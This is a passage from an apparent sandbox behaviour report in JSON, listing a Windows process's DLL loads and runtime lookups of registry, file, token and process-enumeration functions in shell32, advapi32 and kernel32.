"name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75db1050" } ], "repeated": 0, "id": 442 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407668", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 443 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040766b", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75ef7850" } ], "repeated": 0, "id": 444 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040767e", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 445 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407681", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf120" } ], "repeated": 0, "id": 446 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407691", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 447 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407694", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceec0" } ], "repeated": 0, "id": 448 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076a1", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 449 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076a4", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef60" } ], "repeated": 0, "id": 450 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076b7", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 451 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076ba", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecedf0" } ], "repeated": 0, "id": 452 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076c7", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 453 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076ca", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed05d0" } ], "repeated": 0, "id": 454 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076d7", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 455 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076da", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf100" } ], "repeated": 0, "id": 456 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076e7", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 457 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076ea", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegCloseKey" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf030" } ], "repeated": 0, "id": 458 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076fb", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 459 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004076fe", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883380" } ], "repeated": 0, "id": 460 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040770c", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 461 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040770f", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Sleep" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758811a0" } ], "repeated": 0, "id": 462 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407720", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 463 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407723", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835f0" } ], "repeated": 0, "id": 464 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407731", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 465 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407734", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837e0" } ], "repeated": 0, "id": 466 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407742", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 467 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407745", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CopyFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883a50" } ], "repeated": 0, "id": 468 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407759", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 469 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040775c", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DeleteFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833e0" } ], "repeated": 0, "id": 470 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407770", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 471 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407773", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 472 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407781", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 473 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407784", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f660" } ], "repeated": 0, "id": 474 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407798", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 475 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040779b", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetTickCount" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882640" } ], "repeated": 0, "id": 476 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077ae", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 477 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077b1", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 478 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077be", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 479 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077c1", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 480 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077ce", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 481 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077d1", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "OpenProcessToken" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef40" } ], "repeated": 0, "id": 482 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077e4", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 483 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077e7", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "GetTokenInformation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceba0" } ], "repeated": 0, "id": 484 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077fa", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 485 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004077fd", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "AllocateAndInitializeSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf4a0" } ], "repeated": 0, "id": 486 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407810", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 487 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407813", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "EqualSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed07e0" } ], "repeated": 0, "id": 488 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407826", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 489 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407829", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "LookupAccountSidA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ef8100" } ], "repeated": 0, "id": 490 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040783c", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 491 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040783f", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 492 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040784c", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 493 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040784f", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 494 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407862", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 495 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407865", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 496 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407878", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 497 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040787b", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 498 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040788c", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 499 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040788f", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateToolhelp32Snapshot" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a30" } ], "repeated": 0, "id": 500 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078a3", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 501 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078a6", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758791e0" } ], "repeated": 0, "id": 502 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078ba", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 503 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078bd", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75877950" } ], "repeated": 0, "id": 504 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078ce", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 505 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078d1", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Module32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcbd0" } ], "repeated": 0, "id": 506 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078e5", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 507 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078e8", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Module32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcd70" } ], "repeated": 0, "id": 508 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078fc", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 509 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004078ff", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 510 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407913", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 511 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407916", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": 